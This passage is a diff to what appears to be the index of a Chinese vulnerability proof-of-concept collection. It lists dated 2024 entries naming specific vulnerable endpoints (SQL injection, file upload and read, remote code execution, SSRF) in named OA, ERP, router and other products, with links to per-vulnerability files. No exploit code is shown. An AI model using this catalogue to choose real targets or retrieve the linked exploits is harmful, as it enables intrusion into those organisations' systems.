+- [泛微E-office-10接口leave_record.php存在SQL注入漏洞](./泛微OA/泛微E-office-10接口leave_record.php存在SQL注入漏洞.md) +- [用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞](./用友OA/用友GRP-A-Cloud政府财务云系统接口selectGlaDatasourcePreview存在SQL注入漏洞.md) +- [用友NC-Cloud文件服务器用户登陆绕过漏洞](./用友OA/用友NC-Cloud文件服务器用户登陆绕过漏洞.md) ## 2024.07.14 新增漏洞 -- 新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞 -- 金斗云-HKMP智慧商业软件download任意文件读取漏洞 -- 公众号无限回调系统接口siteUrl存在SQL注入漏洞 -- 用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞 -- ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879) -- 天喻软件数据安全平台DownLoad.ashx存在SQL注入 -- 启明星辰-天清汉马VPN接口download任意文件读取 -- 泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞 -- 全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞 +- [新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞](./新中新中小学智慧校园信息管理系统/新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md) +- [金斗云-HKMP智慧商业软件download任意文件读取漏洞](./金斗云/金斗云-HKMP智慧商业软件download任意文件读取漏洞.md) +- [公众号无限回调系统接口siteUrl存在SQL注入漏洞](./公众号无限回调系统/公众号无限回调系统接口siteUrl存在SQL注入漏洞.md) +- [用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md) +- [ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879)](./ServiceNow%20UI/ServiceNow-UI存在Jelly模板注入漏洞(CVE-2024-4879).md) +- [天喻软件数据安全平台DownLoad.ashx存在SQL注入](./天喻软件数据安全平台/天喻软件数据安全平台DownLoad.ashx存在SQL注入.md) +- 
[启明星辰-天清汉马VPN接口download任意文件读取](./启明星辰/启明星辰-天清汉马VPN接口download任意文件读取.md) +- [泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞](./泛微OA/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md) +- [全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞](./全行业小程序运营系统/全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞.md) ## 2024.07.12 新增漏洞 -- 泛微E-Cology接口getFileViewUrl存在SSRF漏洞 -- Pyspider-WebUI未授权访问致远程代码执行漏洞 -- 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞 -- 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞 -- 同享人力管理管理平台DownloadFile存在任意文件下载漏洞 -- 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞 -- 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞 -- 慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞 -- 虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞 -- 风速科技统一认证平台存在密码重置漏洞 -- 联奕统一身份认证平台getDataSource存在信息泄露漏洞 -- PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞 -- 数字通OA-智慧政务接口payslip存在SQL注入漏洞 +- [泛微E-Cology接口getFileViewUrl存在SSRF漏洞](./泛微OA/泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md) +- [Pyspider-WebUI未授权访问致远程代码执行漏洞](./Pyspider%20WebUI/Pyspider-WebUI未授权访问致远程代码执行漏洞.md) +- [赛蓝企业管理系统DownloadBuilder任意文件读取漏洞](./赛蓝企业管理系统/赛蓝企业管理系统DownloadBuilder任意文件读取漏洞.md) +- [上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞](./上讯信息技术股份有限公司/上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞.md) +- [同享人力管理管理平台DownloadFile存在任意文件下载漏洞](./同享人力管理管理平台/同享人力管理管理平台DownloadFile存在任意文件下载漏洞.md) +- [北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞](./北京中科聚网/北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞.md) +- [用友NC-Cloud接口blobRefClassSea存在反序列化漏洞](./用友OA/用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md) +- [慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞](./慧学教育科技有限公司/慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞.md) +- [虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞](./虚拟仿真实验室系统/虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞.md) +- [风速科技统一认证平台存在密码重置漏洞](./风速科技统一认证平台/风速科技统一认证平台存在密码重置漏洞.md) +- [联奕统一身份认证平台getDataSource存在信息泄露漏洞](./联奕统一身份认证平台/联奕统一身份认证平台getDataSource存在信息泄露漏洞.md) +- [PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞](./PowerCreator/PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞.md) +- [数字通OA-智慧政务接口payslip存在SQL注入漏洞](./数字通OA/数字通OA-智慧政务接口payslip存在SQL注入漏洞.md) ## 2024.07.09 新增漏洞 -- 
申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞 -- EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞 -- 深澜计费管理系统proxy存在任意文件读取漏洞 -- 深澜计费管理系统strategy存在反序列化RCE漏洞 -- 大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞 -- 大唐电信AC集中管理平台敏感信息泄漏漏洞 -- 大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞 -- 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞 -- 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞 -- 亿华人力资源管理系统unloadfile存在任意文件上传漏洞 -- EnjoyRMIS-GetOAById存在SQL注入漏洞 -- 亿渡留言管理系统uploadimg存在任意文件上传漏洞 -- 宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞 -- Exam在线考试系统存在前台任意文件上传漏洞 -- 彩票系统存在任意文件preview.php上传漏洞 -- 会捷通云视讯平台fileDownload存在任意文件读取漏洞 -- 正方数字化校园平台RzptManage存在任意文件写入漏洞 -- 鲸发卡系统自动发卡网request_post存在任意文件读取漏洞 -- 用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞 +- [申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞](./申瓯通信在线录音管理系统/申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞.md) +- [EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞](./EduSoho/EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞.md) +- [深澜计费管理系统proxy存在任意文件读取漏洞](./深澜计费管理系统/深澜计费管理系统proxy存在任意文件读取漏洞.md) +- [深澜计费管理系统strategy存在反序列化RCE漏洞](./深澜计费管理系统/深澜计费管理系统strategy存在反序列化RCE漏洞.md) +- [大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞](./大唐电信/大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞.md) +- [大唐电信AC集中管理平台敏感信息泄漏漏洞](./大唐电信/大唐电信AC集中管理平台敏感信息泄漏漏洞.md) +- [大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞](./大唐电信/大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞.md) +- [厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞](./厦门四信通信科技有限公司/厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞.md) +- [中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞](./中科智远科技综合监管云平台/中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞.md) +- [亿华人力资源管理系统unloadfile存在任意文件上传漏洞](./亿华人力资源管理系统/亿华人力资源管理系统unloadfile存在任意文件上传漏洞.md) +- [EnjoyRMIS-GetOAById存在SQL注入漏洞](./EnjoyRMIS/EnjoyRMIS-GetOAById存在SQL注入漏洞.md) +- [亿渡留言管理系统uploadimg存在任意文件上传漏洞](./亿渡留言管理系统/亿渡留言管理系统uploadimg存在任意文件上传漏洞.md) +- [宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞](./宏脉医美行业管理系统/宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞.md) +- [Exam在线考试系统存在前台任意文件上传漏洞](./Exam/Exam在线考试系统存在前台任意文件上传漏洞.md) +- [彩票系统存在任意文件preview.php上传漏洞](./菠菜/彩票系统存在任意文件preview.php上传漏洞.md) +- [会捷通云视讯平台fileDownload存在任意文件读取漏洞](./会捷通云视讯平台/会捷通云视讯平台fileDownload存在任意文件读取漏洞.md) +- 
[正方数字化校园平台RzptManage存在任意文件写入漏洞](./正方/正方数字化校园平台RzptManage存在任意文件写入漏洞.md) +- [鲸发卡系统自动发卡网request_post存在任意文件读取漏洞](./发卡网系统/鲸发卡系统自动发卡网request_post存在任意文件读取漏洞.md) +- [用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞](./用友OA/用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞.md) ## 2024.07.06 新增漏洞 -- 宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞 -- 宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞 -- 宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞 -- 宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞 -- 平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞 -- Docassemble任意文件读取漏洞(CVE-2024-27292) -- WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709) -- rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943) -- Splunk-Enterprise任意文件读取漏洞 +- [宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞.md) +- [宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞.md) +- [宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞](./宏景OA/宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞.md) +- [宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞](./宏景OA/宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞.md) +- [平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞](./平升电子水库监管平台/平升电子水库监管平台GetAllRechargeRecordsBySIMCardId接口处存在SQL注入漏洞.md) +- [Docassemble任意文件读取漏洞(CVE-2024-27292) ](./Docassemble/Docassemble任意文件读取漏洞(CVE-2024-27292).md) +- [WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709)](./WordPress/WordPress插件Recall存在SQL注入漏洞(CVE-2024-32709).md) +- [rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943)](./HSF/rejetto-HFS-3存在远程命令执行漏洞(CVE-2024-39943).md) +- [Splunk-Enterprise任意文件读取漏洞](./Splunk%20Enterprise/Splunk-Enterprise任意文件读取漏洞.md) ## 2024.07.03 新增漏洞 -- 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞 -- 科荣AIO-moffice接口存在SQL注入漏洞 -- 朗新天霁人力资源管理系统GetMessage存在sql注入漏洞 -- 用友u9系统接口GetConnectionString存在信息泄露漏洞 -- YzmCMS接口存在pay_callback远程命令执行 -- 美特CRM系统接口anotherValue存在FastJson反序列化RCE -- 飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞 -- 飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞 -- 大华ICC智能物联综合管理平台heapdump敏感信息泄露 -- 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞 -- 
GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) -- D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853) -- 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞 -- JieLink+智能终端操作平台存在sql注入漏洞 -- 金斗云-HKMP智慧商业软件任意用户添加漏洞 -- 热网无线监测系统SystemManager.asmx存在SQL注入漏洞 -- 喰星云-数字化餐饮服务系统listuser信息泄露漏洞 -- 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞 -- 锐明技术Crocus系统Service.do任意文件读取漏洞 +- [金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞](./金和OA/金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md) +- [科荣AIO-moffice接口存在SQL注入漏洞](./科荣AIO/科荣AIO-moffice接口存在SQL注入漏洞.md) +- [朗新天霁人力资源管理系统GetMessage存在sql注入漏洞](./朗新天霁人力资源管理系统/朗新天霁人力资源管理系统GetMessage存在sql注入漏洞.md) +- [用友u9系统接口GetConnectionString存在信息泄露漏洞](./用友OA/用友u9系统接口GetConnectionString存在信息泄露漏洞.md) +- [YzmCMS接口存在pay_callback远程命令执行](./YzmCMS/YzmCMS接口存在pay_callback远程命令执行.md) +- [美特CRM系统接口anotherValue存在FastJson反序列化RCE](./美特CRM系统/美特CRM系统接口anotherValue存在FastJson反序列化RCE.md) +- [飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞](./飞企互联/飞企互联FE企业运营管理平台ajax_codewidget39.jsp接口存在SQL注入漏洞.md) +- [飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞](./飞企互联/飞企互联FE企业运营管理平台checkGroupCode.js接口存在SQL注入漏洞.md) +- [大华ICC智能物联综合管理平台heapdump敏感信息泄露](./大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md) +- [英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞](./英飞达医学影像存档与通信系统/英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞.md) +- [GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401)](./GeoServer/GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401).md) +- [D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)](./D-Link/D-LINK-Go-RT-AC750%20GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md) +- [致远OA-A8-V5接口officeservlet存在任意文件读取漏洞](./致远OA/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md) +- [JieLink+智能终端操作平台存在sql注入漏洞](./JieLink/JieLink+智能终端操作平台存在sql注入漏洞.md) +- [金斗云-HKMP智慧商业软件任意用户添加漏洞](./金斗云/金斗云-HKMP智慧商业软件任意用户添加漏洞.md) +- [热网无线监测系统SystemManager.asmx存在SQL注入漏洞](./热网无线监测系统/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md) +- [喰星云-数字化餐饮服务系统listuser信息泄露漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md) +- [邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞](./邦永PM2项目管理系统/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md) +- 
[锐明技术Crocus系统Service.do任意文件读取漏洞](./锐明技术Crocus系统/锐明技术Crocus系统Service.do任意文件读取漏洞.md) ## 2024.06.28 新增漏洞 -- WordPress插件Dokan-Pro存在SQL注入漏洞 -- 时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞 -- Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313) -- 通天星CMSV6接口pointManage存在SQL注入 -- 用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞 -- WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512) -- Apache-Kafka的UI中的远程代码执行CVE-2023-52251 -- 碧海威L7产品confirm存在命令执行漏洞 -- 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞 -- 医药信息管理系统GetLshByTj存在SQL注入 -- MSService服务init.do接口处存在SQL注入漏洞 -- Pear-Admin-Boot存在SQL注入漏洞 -- 福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞 -- Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞 -- 铭飞MCMS接口upload.do存在任意文件上传漏洞 -- OpenCart开源电子商务平台divido.php存在SQL注入漏洞 -- D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞 -- 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞 -- 飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞 -- 金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞 +- [WordPress插件Dokan-Pro存在SQL注入漏洞](./WordPress/WordPress插件Dokan-Pro存在SQL注入漏洞.md) +- [时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞](./云时空/时空智友ERP系统updater.uploadStudioFile接口处存在任意文件上传漏洞.md) +- [Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313)](./Apache/Apache-ServiceComb存在SSRF漏洞(CVE-2023-44313).md) +- [通天星CMSV6接口pointManage存在SQL注入](./通天星/通天星CMSV6接口pointManage存在SQL注入.md) +- [用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞](./用友OA/用友U8-Cloud-smartweb2.showRPCLoadingTip.d存在XXE漏洞.md) +- [WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512)](./WordPress/WordPress-MasterStudy-LMS插件存在SQL注入漏洞(CVE-2024-1512).md) +- [Apache-Kafka的UI中的远程代码执行CVE-2023-52251](./Apache/Apache-Kafka的UI中的远程代码执行CVE-2023-52251.md) +- [碧海威L7产品confirm存在命令执行漏洞](./碧海威/碧海威L7产品confirm存在命令执行漏洞.md) +- [万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞](./万户OA/万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md) +- [医药信息管理系统GetLshByTj存在SQL注入](./医药信息管理系统/医药信息管理系统GetLshByTj存在SQL注入.md) +- [MSService服务init.do接口处存在SQL注入漏洞](./MSService/MSService服务init.do接口处存在SQL注入漏洞.md) +- [Pear-Admin-Boot存在SQL注入漏洞](./Pear%20Admin%20Boot/Pear-Admin-Boot存在SQL注入漏洞.md) 
+- [福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞](./福建科立讯通信/福建科立讯通信有限公司指挥调度管理平台uploadgps.php存在SQL注入漏洞.md) +- [Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞](./Magento/Magento开源电子商务平台接口estimate-shipping-methods存在XXE漏洞.md) +- [铭飞MCMS接口upload.do存在任意文件上传漏洞](./铭飞/铭飞MCMS接口upload.do存在任意文件上传漏洞.md) +- [OpenCart开源电子商务平台divido.php存在SQL注入漏洞](./OpenCart/OpenCart开源电子商务平台divido.php存在SQL注入漏洞.md) +- [D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞](./D-Link/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞.md) +- [致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞](./致远OA/致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md) +- [飞企互联-FE企业运营管理平台efficientCodewidget39接口SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台_efficientCodewidget39接口SQL注入漏洞.md) +- [金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞](./金和OA/金和OA-C6接口DownLoadBgImage存在任意文件读取漏洞.md) ## 2024.06.21 新增漏洞 -- 真内控国产化开发平台接口preview任意文件读取漏洞 -- 华测监测预警系统接口UserEdit.aspx存在SQL注入 -- ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662) -- 契约锁电子签章平台add远程命令执行漏洞 -- Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973) -- 新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞 -- XWiki-Platform远程代码执行漏洞 -- 学分制系统GetCalendarContentById存在SQL注入漏洞 -- 云匣子系统接口ssoToolReport存在远程代码执行漏洞 -- 泛微E-Cology-KtreeUploadAction任意文件上传漏洞 -- 极限OA接口video_file.php存在任意文件读取漏洞 -- 锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞 -- 佑友防火墙后台接口download存在任意文件读取漏洞 -- 佑友防火墙后台接口maintain存在命令执行漏洞 -- 极企智能办公路由接口jumper.php存在RCE漏洞 -- 用友Ufida-ELTextFile.load.d任意文件读取漏洞 -- 易天智能eHR管理平台任意用户添加漏洞 -- 多客圈子论坛前台SSRF漏洞 -- APP分发签名系统index-uplog.php存在任意文件上传漏洞 +- [真内控国产化开发平台接口preview任意文件读取漏洞](./真内控国产化开发平台/真内控国产化开发平台接口preview任意文件读取漏洞.md) +- [华测监测预警系统接口UserEdit.aspx存在SQL注入](./华测监测预警系统/华测监测预警系统接口UserEdit.aspx存在SQL注入.md) +- [ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662)](./ShokoServer/ShokoServer系统withpath任意文件读取漏洞(CVE-2023-43662).md) +- [契约锁电子签章平台add远程命令执行漏洞](./契约锁电子签章系统/契约锁电子签章平台add远程命令执行漏洞.md) +- [Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973)](./Zyxe%20NAS/Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973).md) +- 
[新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞](./新视窗新一代物业管理系统/新视窗新一代物业管理系统GetCertificateInfoByStudentId存在SQL注入漏洞.md) +- [XWiki-Platform远程代码执行漏洞](./XWiki/XWiki-Platform远程代码执行漏洞.md) +- [学分制系统GetCalendarContentById存在SQL注入漏洞](./学分制系统/学分制系统GetCalendarContentById存在SQL注入漏洞.md) +- [云匣子系统接口ssoToolReport存在远程代码执行漏洞](./云匣子堡垒机/云匣子系统接口ssoToolReport存在远程代码执行漏洞.md) +- [泛微E-Cology-KtreeUploadAction任意文件上传漏洞](./泛微OA/泛微E-Cology-KtreeUploadAction任意文件上传漏洞.md) +- [极限OA接口video_file.php存在任意文件读取漏洞](./极限OA/极限OA接口video_file.php存在任意文件读取漏洞.md) +- [锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞](./锐捷/锐捷上网行为管理系统static_convert.php存在远程命令执行漏洞.md) +- [佑友防火墙后台接口download存在任意文件读取漏洞](./佑友防火墙/佑友防火墙后台接口download存在任意文件读取漏洞.md) +- [佑友防火墙后台接口maintain存在命令执行漏洞](./佑友防火墙/佑友防火墙后台接口maintain存在命令执行漏洞.md) +- [极企智能办公路由接口jumper.php存在RCE漏洞](./路由器/极企智能办公路由接口jumper.php存在RCE漏洞.md) +- [用友Ufida-ELTextFile.load.d任意文件读取漏洞](./用友OA/用友Ufida-ELTextFile.load.d任意文件读取漏洞.md) +- [易天智能eHR管理平台任意用户添加漏洞](./易天智能eHR管理平台/易天智能eHR管理平台任意用户添加漏洞.md) +- [多客圈子论坛前台SSRF漏洞](./多客圈子论坛系统/多客圈子论坛前台SSRF漏洞.md) +- [APP分发签名系统index-uplog.php存在任意文件上传漏洞](./分发签名系统/APP分发签名系统index-uplog.php存在任意文件上传漏洞.md) ## 2024.06.18 新增漏洞 -- 禅道18.5存在后台命令执行漏洞 -- Fastadmin框架存在任意文件读取漏洞 -- CRMEB开源商城v5.2.2存在sql注入漏洞 -- AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597) -- 悦库企业网盘userlogin.html存在SQL注入漏洞 -- 仿新浪外汇余额宝时间交易所任意文件读取 -- 申瓯通信在线录音管理系统download任意文件读取漏洞 -- 致远互联FE协作办公平台ncsubjass存在SQL注入 -- 世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞 -- 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞 -- 平升水库水文监测系统默认密码 +- [禅道18.5存在后台命令执行漏洞](./禅道/禅道18.5存在后台命令执行漏洞.md) +- [Fastadmin框架存在任意文件读取漏洞](./Fastadmin/Fastadmin框架存在任意文件读取漏洞.md) +- [CRMEB开源商城v5.2.2存在sql注入漏洞](./CRMEB/CRMEB开源商城v5.2.2存在sql注入漏洞.md) +- [AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)](./AEGON/AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md) +- [悦库企业网盘userlogin.html存在SQL注入漏洞](./悦库企业网盘/悦库企业网盘userlogin.html存在SQL注入漏洞.md) +- [仿新浪外汇余额宝时间交易所任意文件读取](./交易所系统/仿新浪外汇余额宝时间交易所任意文件读取.md) +- [申瓯通信在线录音管理系统download任意文件读取漏洞](./申瓯通信在线录音管理系统/申瓯通信在线录音管理系统download任意文件读取漏洞.md) +- 
[致远互联FE协作办公平台ncsubjass存在SQL注入](./致远OA/致远互联FE协作办公平台ncsubjass存在SQL注入.md) +- [世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞](./世邦通信/世邦通信SPON-IP网络对讲广播系统my_parser.php任意文件上传漏洞.md) +- [万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞](./万户OA/万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞.md) +- [平升水库水文监测系统默认密码](./平升电子水库监管平台/平升水库水文监测系统默认密码.md) ## 2024.06.14 新增漏洞 -- 致远oa系统saveFormula4Cloud存在JNDI注入 -- 用友NC-oacoSchedulerEvents接口存在sql注入漏洞 -- 致远OA帆软组件ReportServer目录遍历漏洞 -- 泛微-eoffice-webservice-file-upload任意文件上传漏洞 -- 泛微e-office-mobile_upload_save存在任意文件上传漏洞 -- 泛微e-office-uploadify.php存在任意文件上传漏洞 -- 世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞 -- 电信网关配置管理后台del_file.php接口存在命令执行漏洞 -- Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824) -- JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞 -- 东胜物流软件GetProParentModuTreeList存在SQL注入漏洞 -- 锐捷NBR系列路由器存在管理员密码重置漏洞 -- 海洋CMS-admin_notify.php远程代码执行漏洞 -- SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995) +- [致远oa系统saveFormula4Cloud存在JNDI注入](./致远OA/致远oa系统saveFormula4Cloud存在JNDI注入.md) +- [用友NC-oacoSchedulerEvents接口存在sql注入漏洞](./用友OA/用友NC-oacoSchedulerEvents接口存在sql注入漏洞.md) +- [致远OA帆软组件ReportServer目录遍历漏洞](./致远OA/致远OA帆软组件ReportServer目录遍历漏洞.md) +- [泛微-eoffice-webservice-file-upload任意文件上传漏洞](./泛微OA/泛微-eoffice-webservice-file-upload任意文件上传漏洞.md) +- [泛微e-office-mobile_upload_save存在任意文件上传漏洞](./泛微OA/泛微e-office-mobile_upload_save存在任意文件上传漏洞.md) +- [泛微e-office-uploadify.php存在任意文件上传漏洞](./泛微OA/泛微e-office-uploadify.php存在任意文件上传漏洞.md) +- [世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞](./世邦通信/世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞.md) +- [电信网关配置管理后台del_file.php接口存在命令执行漏洞](./电信网关配置管理/电信网关配置管理后台del_file.php接口存在命令执行漏洞.md) +- [Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824)](./Ivanti/Ivanti-EPM存在SQL注入漏洞(CVE-2024-29824).md) +- [JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞](./JEPaaS低代码平台/JEPaaS低代码平台j_spring_security_check存在SQL注入漏洞.md) +- [东胜物流软件GetProParentModuTreeList存在SQL注入漏洞](./东胜物流软件/东胜物流软件GetProParentModuTreeList存在SQL注入漏洞.md) +- [锐捷NBR系列路由器存在管理员密码重置漏洞](./锐捷/锐捷NBR系列路由器存在管理员密码重置漏洞.md) +- 
[海洋CMS-admin_notify.php远程代码执行漏洞](./海洋cms/海洋CMS-admin_notify.php远程代码执行漏洞.md) +- [SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995)](./SolarWinds%20Serv%20U/SolarWinds-Serv-U目录遍历漏洞(CVE-2024-28995).md) ## 2024.06.11 新增漏洞 -- 海康威视综合安防管理平台keepAlive远程代码执行漏洞 -- 金和OA-C6-download.jsp任意文件读取漏洞 -- 锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116) -- HFS2.3未经身份验证的远程代码执行(CVE-2024-23692) -- 29网课交单平台epay.php存在SQL注入漏洞 -- 多客圈子论坛系统httpGet任意文件读取漏洞复现 +- [海康威视综合安防管理平台keepAlive远程代码执行漏洞](./海康威视/海康威视综合安防管理平台keepAlive远程代码执行漏洞.md) +- [金和OA-C6-download.jsp任意文件读取漏洞](./金和OA/金和OA-C6-download.jsp任意文件读取漏洞.md) +- [锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116)](./锐捷/锐捷校园网自助服务系统login_judge.jsf任意文件读取漏洞(XVE-2024-2116).md) +- [HFS2.3未经身份验证的远程代码执行(CVE-2024-23692)](./HSF/HFS2.3未经身份验证的远程代码执行(CVE-2024-23692).md) +- 